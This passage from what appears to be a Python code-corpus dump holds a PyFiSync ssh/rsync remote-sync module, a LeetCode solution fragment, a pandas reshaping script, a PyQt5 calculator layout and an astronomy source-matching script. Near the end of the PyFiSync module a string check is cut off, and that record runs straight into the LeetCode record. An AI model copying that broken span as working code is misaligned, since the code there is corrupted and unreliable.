== True\n * Backup should NOT happen if config.backup == False\n * If a backup of the file already exists, it should append an integer\n starting at 0\n \"\"\"\n raise NotImplementedError()\n \n def transfer(self,tqA2B,tqB2A):\n \"\"\"\n * Apply the trasnfer from B to A and from A to B\n * MUST maintain modification times upon transfer\n \"\"\"\n raise NotImplementedError()\n\n def close(self):\n \"\"\"\n * If it has this function, it will try to call it at the very end\n \"\"\"\n pass\n\n @staticmethod\n def cli(argv): \n \"\"\"\n should be decorated with @staticmethod\n All of the commands will be passed. Can use this to communicate remotely\n if needed\n\n For example\n ./PyFiSync.py _api file_list --flag1 val1 --flag2\n\n will pass argv = ['file_list', '--flag1', 'val1', '--flag2']\n \"\"\"\n pass\n\nclass ssh_rsync(remote_interface_base):\n def __init__(self,config,log=None):\n self.config = config\n if log is None:\n log = utils.logger(silent=False,path=None)\n self.log = log\n if config.persistant:\n # Set up master connection for 600 seconds \n self.sm = '-S /tmp/' + _randstr(5)\n cmd = 'ssh -N -M {sm:s} -p {ssh_port:d} -q {userhost:s}'.\\\n format(sm=self.sm,**config.__dict__) \n \n self.persistant_proc = subprocess.Popen(shlex.split(cmd))\n \n else:\n self.sm = '' # Do nothings\n \n def file_list(self,attributes,empty=None):\n \"\"\"\n Get the file list in B (remote)\n \"\"\" \n attributes = list(set(attributes))\n config = self.config\n log = self.log\n\n\n # Construct the command\n cmd = 'ssh {sm} -p {ssh_port:d} -q {userhost:s} \"'.format(sm=self.sm,**config.__dict__)\n\n # construct the call cmd\n if len(config.PyFiSync_path) == 0:\n cmd += 'PyFiSync _api file_list\"'\n else:\n cmd += config.remote_program + ' '\n if any(config.PyFiSync_path.endswith('PyFiSync'+ext) for ext in ['','.py']):\n cmd += config.PyFiSync_path + ' _api file_list\"'\n else:\n cmd += os.path.join(config.PyFiSync_path,'PyFiSync.py _api file_list\"')\n \n \n remote_config = dict()\n \n remote_config['path'] = config.pathB\n remote_config['excludes'] = list(set(config.excludes))\n remote_config['empty'] = empty\n remote_config['attributes'] = list(set(attributes))\n remote_config['copy_symlinks_as_links'] = config.copy_symlinks_as_links\n remote_config['git_exclude'] = config.git_exclude\n remote_config['use_hash_db'] = config.use_hash_db\n \n log.add('Calling for remote file list')\n \n # Encode the config. Just in case there is any additional cruft, add\n # a starting sentinel\n sentinel = _randstr(N=10).encode('ascii')\n cmd = shlex.split(cmd)\n cmd[-1] += ' ' + sentinel.decode('ascii') # Add the sentinel to the final command\n \n json_config = sentinel+json.dumps(remote_config,ensure_ascii=False).encode('utf8')\n \n # Use a tempfile to prevent a buffering issue\n outfile = tempfile.NamedTemporaryFile(mode='wb',delete=False)\n \n proc = subprocess.Popen(cmd,stdin=subprocess.PIPE, \n stdout=outfile,\n stderr=subprocess.PIPE, \n bufsize=1,shell=False) \n _,err = proc.communicate(json_config)\n \n if len(err)>0:\n err = utils.to_unicode(err)\n log.add('Remote Call returned warnings:')\n log.space = 4\n log.add(err)\n log.space = 0\n\n # Read back the output, find the sentinel, decompress and return the output\n with open(outfile.name,'rb') as F:\n out = F.read()\n out = out[out.find(sentinel) + len(sentinel):]\n\n try:\n out = zlib.decompress(out) \n except:\n return\n \n return json.loads(out)\n\n def apply_queue(self,queue,force=False):\n \"\"\"\n Remote call to apply queue assumeing B is remote\n \"\"\"\n log = self.log\n config = self.config\n\n if len(queue) == 0:\n log.add(' >> No remote actions <<')\n return\n\n sentinel = _randstr(N=10).encode('ascii')\n \n queue_bytes = json.dumps(queue,ensure_ascii=False).encode('utf8')\n \n # Construct the command\n cmd = 'ssh {sm} -p {ssh_port:d} -q {userhost:s} \"'.format(\n sm=self.sm,**config.__dict__)\n\n # construct the call cmd\n if len(config.PyFiSync_path) == 0:\n cmd += 'PyFiSync _api apply_queue'\n else:\n cmd += config.remote_program + ' '\n if any(config.PyFiSync_path.endswith('PyFiSync'+ext) for ext in ['','.py']):\n cmd += config.PyFiSync_path + ' _api apply_queue'\n else:\n cmd += os.path.join(config.PyFiSync_path,'PyFiSync.py _api apply_queue')\n \n \n if force:\n cmd += ' --force '\n\n if not config.backup:\n cmd += ' --no-backup '\n\n cmd += ' ' + config.pathB + ' {}\"'.format(sentinel.decode('ascii'))\n\n out = ''\n err = ''\n\n log.space=0\n log.add('\\nApplying queue on remote')\n log.prepend = '> '\n\n started = False\n cmd = shlex.split(cmd)\n proc = subprocess.Popen(cmd,stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, \n bufsize=1,shell=False)\n \n proc.stdin.write(sentinel + queue_bytes)\n proc.stdin.close()\n \n with proc.stdout as stdout:\n for line in iter(stdout.readline, b''):\n line = utils.to_unicode(line)\n if not started and line.find('START>>>>>>>')>=0:\n started = True\n continue\n\n if line.find('<<<<<<=0:\n started = False\n\n if started:\n log.add(line.rstrip())\n\n\n with proc.stderr as stderr:\n for line in iter(stderr.readline, b''):\n err += utils.to_unicode(line)\n proc.wait()\n log.prepend = ''\n if len(err)>0:\n log.add('Remote Call returned warnings:')\n log.space = 4\n log.add(err)\n\n def transfer(self,tqA2B,tqB2A):\n config = self.config\n log = self.log\n\n pwd0 = os.getcwd()\n os.chdir(config.pathA)\n\n # Build the command\n cmd = 'rsync -azvi -hh ' \\\n + '--keep-dirlinks --copy-dirlinks ' # make directory links behave like they were folders\n \n if config.rsync_checksum:\n cmd += '--checksum '\n \n if not config.copy_symlinks_as_links:\n cmd += '--copy-links ' \n \n if len(config.userhost) >0:\n cmd += '-e \"ssh -q -p {p:d} {sm}\" '.format(p=config.ssh_port,sm=self.sm)\n B = '{userhost:s}:{pathB:s}'.format(**config.__dict__)\n else:\n B = '{pathB:s}'.format(**config.__dict__)\n\n cmd += ' --files-from={files:s} {src:s}/ {dest:s}/'\n\n log.add('(using rsync)')\n\n if len(tqA2B) > 0:\n\n # A2B\n tmp_file = '/tmp/tqA2B' + _randstr()\n\n for ix,item in enumerate(tqA2B): # Opperate on the list IN PLACE\n item = item.encode('utf-8')\n tqA2B[ix] = item\n\n with open(tmp_file,'wb') as F:\n F.write('\\n'.encode('utf-8').join(tqA2B))\n\n cmdA2B = cmd.format(files=tmp_file,src=config.pathA,dest=B)\n\n log.space=1\n log.add('Running rsync A >>> B')\n log.add(' cmd = ' + cmdA2B)\n log.space=4\n\n\n proc = subprocess.Popen(cmdA2B, stdout=subprocess.PIPE, bufsize=1,shell=True)\n with proc.stdout:\n for line in iter(proc.stdout.readline, b''):\n line = self._proc_final_log(line)\n log.add(line)\n\n proc.wait()\n else:\n log.space=1\n log.add('\\nNo A >>> B transfers')\n\n #########\n\n if len(tqB2A) > 0:\n # B2A\n tmp_file = '/tmp/tqB2A' + _randstr()\n for ix,item in enumerate(tqB2A): # Opperate on the list IN PLACE\n item = item.encode('utf-8')\n tqB2A[ix] = item\n\n with open(tmp_file,'wb') as F:\n F.write('\\n'.encode('utf-8').join(tqB2A))\n\n cmdB2A = cmd.format(files=tmp_file,dest=config.pathA,src=B)\n\n log.space=1\n log.add('\\nRunning rsync A <<< B')\n log.add(' cmd = ' + cmdB2A)\n log.space=4\n\n proc = subprocess.Popen(cmdB2A, stdout=subprocess.PIPE, bufsize=1,shell=True)\n with proc.stdout:\n for line in iter(proc.stdout.readline, b''):\n line = self._proc_final_log(line)\n log.add(line)\n\n proc.wait()\n else:\n log.space=1\n log.add('\\nNo A <<< B transfers')\n\n os.chdir(pwd0)\n\n\n def _proc_final_log(self,line):\n line = line.strip()\n if len(line) == 0: return None\n try:\n line = utils.to_unicode(line)\n except:\n return None\n try:\n action_path = [i.strip() for i in line.split(' ',1)]\n except UnicodeDecodeError: # A bit of a hack but this works to make py2 happy\n action_path = [utils.to_unicode(a) for a in line.decode('utf8').split(' ')]\n \n if len(action_path) != 2:\n return 'could not parse action: {:s}'.format(line)\n\n action = action_path[0]\n path = action_path[1]\n\n action = action.replace('<','>')\n\n if action.startswith('sent'):\n return '\\n' + line\n if action.startswith('total'):\n return line\n\n if any([action.startswith(d) for d in ['receiving','building']]):\n return None\n\n if action.startswith('>'): return 'Transfer ' + path\n if action.startswith('cd'): return 'mkdir ' + path\n if action.startswith('cL'): return 'link ' + path\n if action.startswith('.'): return None\n\n return line\n\n @staticmethod\n def cli(argv):\n from . import PFSwalk\n from . import main\n \n mode = argv[0]\n argv = argv[1:]\n if mode == 'file_list':\n # Get the sentinel\n sentinel = argv[0].encode('ascii')\n \n # For python3 to read bytes\n stdin = sys.stdin\n if hasattr(stdin,'buffer'):\n stdin = stdin .buffer\n stdout = sys.stdout\n if hasattr(stdout,'buffer'):\n stdout = stdout.buffer\n \n # Read the config, find and cut up to the sentinel, convert to \n # unicode and json load\n \n \n remote_config_bytes = stdin.read() \n remote_config_bytes = remote_config_bytes[remote_config_bytes.find(sentinel)+len(sentinel):]\n remote_config_bytes = remote_config_bytes.decode('utf8')\n remote_config = json.loads(remote_config_bytes)\n \n # Process the input\n path = remote_config['path']\n config = utils.configparser()\n config.pathA = path\n\n sha1 = 'sha1' in remote_config['attributes']\n empty = remote_config['empty']\n config.copy_symlinks_as_links = remote_config['copy_symlinks_as_links']\n config.git_exclude = remote_config['git_exclude']\n config.excludes = list(set(config.excludes + remote_config['excludes']))\n config.use_hash_db = remote_config['use_hash_db']\n \n # Generate the list. This may raise errors so do not start\n # capture until later\n log = utils.logger(silent=True,path=None)\n _tmp = PFSwalk.file_list(path,config,log,sha1=sha1,empty=empty,\n use_hash_db=config.use_hash_db)\n flist = _tmp.files()\n\n out = json.dumps(flist,ensure_ascii=False)\n out = zlib.compress(out.encode('utf8'),9) # Compress it\n \n stdout.write(sentinel + out) # write the bytes\n \n elif mode == 'apply_queue':\n import getopt # Even though it is \"old school\" use getopt here \n # since it is easier and this interface is never \n # exposed to the user\n # For python3 to read bytes\n stdin = sys.stdin\n if hasattr(stdin,'buffer'):\n stdin = stdin.buffer\n stdout = sys.stdout\n if hasattr(stdout,'buffer'):\n stdout = stdout.buffer\n \n try:\n opts, args = getopt.getopt(argv, \"\",['force','no-backup'])\n except getopt.GetoptError as err:\n print(str(err)) #print error\n sys.exit(2)\n\n path,sentinel = args\n\n config = utils.configparser()\n config.pathA = path\n\n # Place the config into PyFiSync\n main.config = config\n\n force = False\n for opt,val in opts:\n if opt == '--force':\n force = True\n if opt == '--no-backup':\n config.backup = False\n\n log = utils.logger(path=path,silent=False)\n\n sys.stdout.write('START>>>>>>>\\n')\n\n # Get the queue from stdin\n sentinel = sentinel.encode('ascii')\n queue = stdin.read()\n queue = queue[queue.find(sentinel)+len(sentinel):]\n queue = queue.decode('utf8')\n\n try:\n queue = json.loads(queue)\n except Exception as E:\n sys.stderr.write('could not parse input. Error: \"{}\"'.format(E))\n sys.exit(2)\n\n print('Successfully loading action queue of {:d} items'.format(len(queue)))\n\n main.apply_action_queue(path,queue,force=force)\n\n sys.stdout.write('\\n<<<<<< 1]\n\t\t\tres = len(dic_tmp)\n\t\t\treturn res\n\t\telif k > 0:\n\t\t\tnums = set(nums)\n\t\t\tnums_tmp = set([n+k for n in nums])\n\t\t\tres = len(nums & nums_tmp)\n\t\t\treturn res\n\t\telse:\n\t\t\treturn 0\n","sub_path":"501-600/532-k-diff-pairs-in-an-array.py","file_name":"532-k-diff-pairs-in-an-array.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"434713772","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 26 13:10:35 2018\n\n@author: TZQ88888\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nheaders='''\nxSurf\nxFlux\nk*us*avdens*avcp\nk\nus\navdens\navcp\nxFlux/(k*us*avdens*avcp)\n(LOG(z2zd/z0h)-psyhz2+psyhz0)\nLOG(z2zd/z0h)\nz2zd\nL_mod\nz0h\nz2zd/L_mod\npsyhz2\npsyhz0\npsyhz2-psyhz0\nxDiag\nCH\n'''\ndf=pd.read_csv('ch1.txt',sep='\\s+',skipinitialspace=True,header=None)\ndf=df.values.reshape(-1,19)\ndf1=pd.DataFrame(data=df,columns=headers.split('\\n')[1:-1])\ndf1.to_csv('ch_diag.csv',index=None,sep='\\t')","sub_path":"SUEWS_simulation/Archive/T2-debug/qh_check/ch_read.py","file_name":"ch_read.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"419534764","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nimport sys\nclass Ui_MainCalcWindow(object):\n def setup_ui(self, MainCalcWindow):\n MainCalcWindow.setObjectName(\"MainCalcWindow\")\n MainCalcWindow.resize(505, 600)\n MainCalcWindow.setTabShape(QtWidgets.QTabWidget.Rounded)\n MainCalcWindow.setWindowTitle(\"Simple Calculator\")\n self.calc_widget = QtWidgets.QWidget(MainCalcWindow)\n self.calc_widget.setObjectName(\"calc_widget\")\n self.verticalLayoutWidget = QtWidgets.QWidget(self.calc_widget)\n self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 484, 601))\n self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n self.main_vert_layout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)\n self.main_vert_layout.setContentsMargins(0, 0, 0, 0)\n self.main_vert_layout.setSpacing(0)\n self.main_vert_layout.setObjectName(\"main_vert_layout\") \n self.lcd_label = QtWidgets.QLabel(self.verticalLayoutWidget)\n self.lcd_label.setMinimumSize(QtCore.QSize(0, 100))\n self.lcd_label.setMaximumSize(QtCore.QSize(16777215, 100))\n font = QtGui.QFont()\n font.setFamily(\"Tlwg Typist\")\n font.setPointSize(36)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(50)\n self.lcd_label.setFont(font)\n self.lcd_label.setFrameShape(QtWidgets.QFrame.Box)\n self.lcd_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.lcd_label.setObjectName(\"lcd_label\")\n self.main_vert_layout.addWidget(self.lcd_label)\n self.btn_grid_layout = QtWidgets.QGridLayout()\n self.btn_grid_layout.setSpacing(0)\n self.btn_grid_layout.setObjectName(\"btn_grid_layout\")\n self.btn_four = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_four.sizePolicy().hasHeightForWidth())\n self.btn_four.setSizePolicy(sizePolicy)\n self.btn_four.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_four.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_four.setObjectName(\"btn_four\")\n self.btn_grid_layout.addWidget(self.btn_four, 1, 0, 1, 1)\n self.btn_subtract = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_subtract.sizePolicy().hasHeightForWidth())\n self.btn_subtract.setSizePolicy(sizePolicy)\n self.btn_subtract.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_subtract.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_subtract.setDefault(False)\n self.btn_subtract.setObjectName(\"btn_subtract\")\n self.btn_grid_layout.addWidget(self.btn_subtract, 1, 3, 1, 1)\n self.btn_multiply = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_multiply.sizePolicy().hasHeightForWidth())\n self.btn_multiply.setSizePolicy(sizePolicy)\n self.btn_multiply.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_multiply.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_multiply.setDefault(False)\n self.btn_multiply.setObjectName(\"btn_multiply\")\n self.btn_grid_layout.addWidget(self.btn_multiply, 2, 3, 1, 1)\n self.btn_five = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_five.sizePolicy().hasHeightForWidth())\n self.btn_five.setSizePolicy(sizePolicy)\n self.btn_five.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_five.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_five.setObjectName(\"btn_five\")\n self.btn_grid_layout.addWidget(self.btn_five, 1, 1, 1, 1)\n self.btn_nine = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_nine.sizePolicy().hasHeightForWidth())\n self.btn_nine.setSizePolicy(sizePolicy)\n self.btn_nine.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_nine.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_nine.setObjectName(\"btn_nine\")\n self.btn_grid_layout.addWidget(self.btn_nine, 0, 2, 1, 1)\n self.btn_clear = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_clear.sizePolicy().hasHeightForWidth())\n self.btn_clear.setSizePolicy(sizePolicy)\n self.btn_clear.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_clear.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_clear.setDefault(False)\n self.btn_clear.setObjectName(\"btn_clear\")\n self.btn_grid_layout.addWidget(self.btn_clear, 4, 0, 1, 1)\n self.btn_zero = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_zero.sizePolicy().hasHeightForWidth())\n self.btn_zero.setSizePolicy(sizePolicy)\n self.btn_zero.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_zero.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_zero.setObjectName(\"btn_zero\")\n self.btn_grid_layout.addWidget(self.btn_zero, 4, 1, 1, 1)\n self.btn_three = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_three.sizePolicy().hasHeightForWidth())\n self.btn_three.setSizePolicy(sizePolicy)\n self.btn_three.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_three.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_three.setObjectName(\"btn_three\")\n self.btn_grid_layout.addWidget(self.btn_three, 2, 2, 1, 1)\n self.btn_one = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_one.sizePolicy().hasHeightForWidth())\n self.btn_one.setSizePolicy(sizePolicy)\n self.btn_one.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_one.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_one.setObjectName(\"btn_one\")\n self.btn_grid_layout.addWidget(self.btn_one, 2, 0, 1, 1)\n self.btn_add = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_add.sizePolicy().hasHeightForWidth())\n self.btn_add.setSizePolicy(sizePolicy)\n self.btn_add.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_add.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_add.setDefault(False)\n self.btn_add.setObjectName(\"btn_add\")\n self.btn_grid_layout.addWidget(self.btn_add, 0, 3, 1, 1)\n self.btn_seven = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_seven.sizePolicy().hasHeightForWidth())\n self.btn_seven.setSizePolicy(sizePolicy)\n self.btn_seven.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_seven.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_seven.setObjectName(\"btn_seven\")\n self.btn_grid_layout.addWidget(self.btn_seven, 0, 0, 1, 1)\n self.btn_divide = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_divide.sizePolicy().hasHeightForWidth())\n self.btn_divide.setSizePolicy(sizePolicy)\n self.btn_divide.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_divide.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_divide.setAutoDefault(False)\n self.btn_divide.setDefault(False)\n self.btn_divide.setFlat(False)\n self.btn_divide.setObjectName(\"btn_divide\")\n self.btn_grid_layout.addWidget(self.btn_divide, 4, 3, 1, 1)\n self.btn_equals = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_equals.sizePolicy().hasHeightForWidth())\n self.btn_equals.setSizePolicy(sizePolicy)\n self.btn_equals.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_equals.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_equals.setObjectName(\"btn_equals\")\n self.btn_grid_layout.addWidget(self.btn_equals, 4, 2, 1, 1)\n self.btn_six = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_six.sizePolicy().hasHeightForWidth())\n self.btn_six.setSizePolicy(sizePolicy)\n self.btn_six.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_six.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_six.setObjectName(\"btn_six\")\n self.btn_grid_layout.addWidget(self.btn_six, 1, 2, 1, 1)\n self.btn_two = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_two.sizePolicy().hasHeightForWidth())\n self.btn_two.setSizePolicy(sizePolicy)\n self.btn_two.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_two.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_two.setObjectName(\"btn_two\")\n self.btn_grid_layout.addWidget(self.btn_two, 2, 1, 1, 1)\n self.btn_eight = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_eight.sizePolicy().hasHeightForWidth())\n self.btn_eight.setSizePolicy(sizePolicy)\n self.btn_eight.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_eight.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_eight.setObjectName(\"btn_eight\")\n self.btn_grid_layout.addWidget(self.btn_eight, 0, 1, 1, 1)\n self.main_vert_layout.addLayout(self.btn_grid_layout)\n spacerItem = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n self.main_vert_layout.addItem(spacerItem)\n MainCalcWindow.setCentralWidget(self.calc_widget)\n\n self.retranslate_ui(MainCalcWindow)\n QtCore.QMetaObject.connectSlotsByName(MainCalcWindow)\n\n def retranslate_ui(self, MainCalcWindow):\n _translate = QtCore.QCoreApplication.translate \n self.btn_four.setText(_translate(\"MainCalcWindow\", \"4\"))\n self.btn_subtract.setText(_translate(\"MainCalcWindow\", \"-\"))\n self.btn_multiply.setText(_translate(\"MainCalcWindow\", \"*\"))\n self.btn_five.setText(_translate(\"MainCalcWindow\", \"5\"))\n self.btn_nine.setText(_translate(\"MainCalcWindow\", \"9\"))\n self.btn_clear.setText(_translate(\"MainCalcWindow\", \"AC\"))\n self.btn_zero.setText(_translate(\"MainCalcWindow\", \"0\"))\n self.btn_three.setText(_translate(\"MainCalcWindow\", \"3\"))\n self.btn_one.setText(_translate(\"MainCalcWindow\", \"1\"))\n self.btn_add.setText(_translate(\"MainCalcWindow\", \"+\"))\n self.btn_seven.setText(_translate(\"MainCalcWindow\", \"7\"))\n self.btn_divide.setText(_translate(\"MainCalcWindow\", \"/\"))\n self.btn_equals.setText(_translate(\"MainCalcWindow\", \"=\"))\n self.btn_six.setText(_translate(\"MainCalcWindow\", \"6\"))\n self.btn_two.setText(_translate(\"MainCalcWindow\", \"2\"))\n self.btn_eight.setText(_translate(\"MainCalcWindow\", \"8\"))\n\n","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":13763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"248556576","text":"import numpy as np\nimport glob\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import MultipleLocator\nplt.rcParams['figure.dpi'] = 300 #分辨率\nplt.rc('font',family='Times New Roman') ### 设置新字体\nfile_path = '/home/lab30202/lq/ai_future/low_exporsure_emsemble/fpn_resnet_detnet_v2/validation'\nthresholds = [0.4,0.5,0.6]\n\ndef sex_list_match(sex_img,list_img,section_target_num):\n ### matching\n match_num = 0\n match = 0\n det_target = sex_img.shape[0]\n number_target = section_target_num\n match_value = 1.5\n match_list = []\n for i in range(det_target):\n match_single = 0\n x_axis = sex_img[i][1]\n y_axis = sex_img[i][2]\n for j in range(number_target):\n if abs(x_axis - list_img[j][1]) <= match_value and abs(y_axis - list_img[j][2]) <= match_value:\n match_num += 1\n match += 1\n match_single += 1\n match_list.append(match_single)\n if match_num > number_target:\n match_num = number_target\n precision = match_num / det_target\n if number_target != 0:\n recall = match/number_target\n else:\n recall = 1\n precision = 1\n return precision,recall\n\n\ndef det_list_match(det_img,list_img,section_target_num):\n ### matching\n match_num = 0\n match = 0\n det_target = det_img.shape[0]\n number_target = section_target_num\n match_value = 1.5\n for i in range(det_target):\n x_axis = (det_img[i][0]+det_img[i][2])/2\n y_axis = (det_img[i][1]+det_img[i][3])/2\n for j in range(number_target):\n if abs(x_axis - list_img[j][1]) <= match_value and abs(y_axis - list_img[j][2]) <= match_value:\n match_num += 1\n match += 1\n if match_num > number_target:\n match_num = number_target\n precision = match_num/det_target\n if number_target != 0:\n recall = match/number_target\n else:\n recall = 1\n precision = 1\n\n return precision,recall\ndef compute_section_target(list_list_img):\n mag9_10 = 0\n mag10_11 = 0\n mag11_12 = 0\n mag12_13 = 0\n mag13_14 = 0\n mag14_15 = 0\n mag15_16 = 0\n mag16_17 = 0\n mag17_18 = 0\n mag18_19 = 0\n mag19_20 = 0\n mag20_21 = 0\n mag21_22 = 0\n mag22_23 = 0\n mag23_24 = 0\n mag24_25 = 0\n mag9_10_list = []\n mag10_11_list = []\n mag11_12_list = []\n mag12_13_list = []\n mag13_14_list = []\n mag14_15_list = []\n mag15_16_list = []\n mag16_17_list = []\n mag17_18_list = []\n mag18_19_list = []\n mag19_20_list = []\n mag20_21_list = []\n mag21_22_list = []\n mag22_23_list = []\n mag23_24_list = []\n mag24_25_list = []\n\n for step,value in enumerate(list_list_img):\n if 9 <= value[3] < 10:\n mag9_10 += 1\n mag9_10_list.append(value)\n if 10 <= value[3] < 11:\n mag10_11 += 1\n mag10_11_list.append(value)\n if 11 <= value[3] < 12:\n mag11_12 += 1\n mag11_12_list.append(value)\n if 12 <= value[3] < 13:\n mag12_13 += 1\n mag12_13_list.append(value)\n if 13 <= value[3] < 14:\n mag13_14 += 1\n mag13_14_list.append(value)\n if 14 <= value[3] < 15:\n mag14_15 += 1\n mag14_15_list.append(value)\n elif 15 <= value[3] < 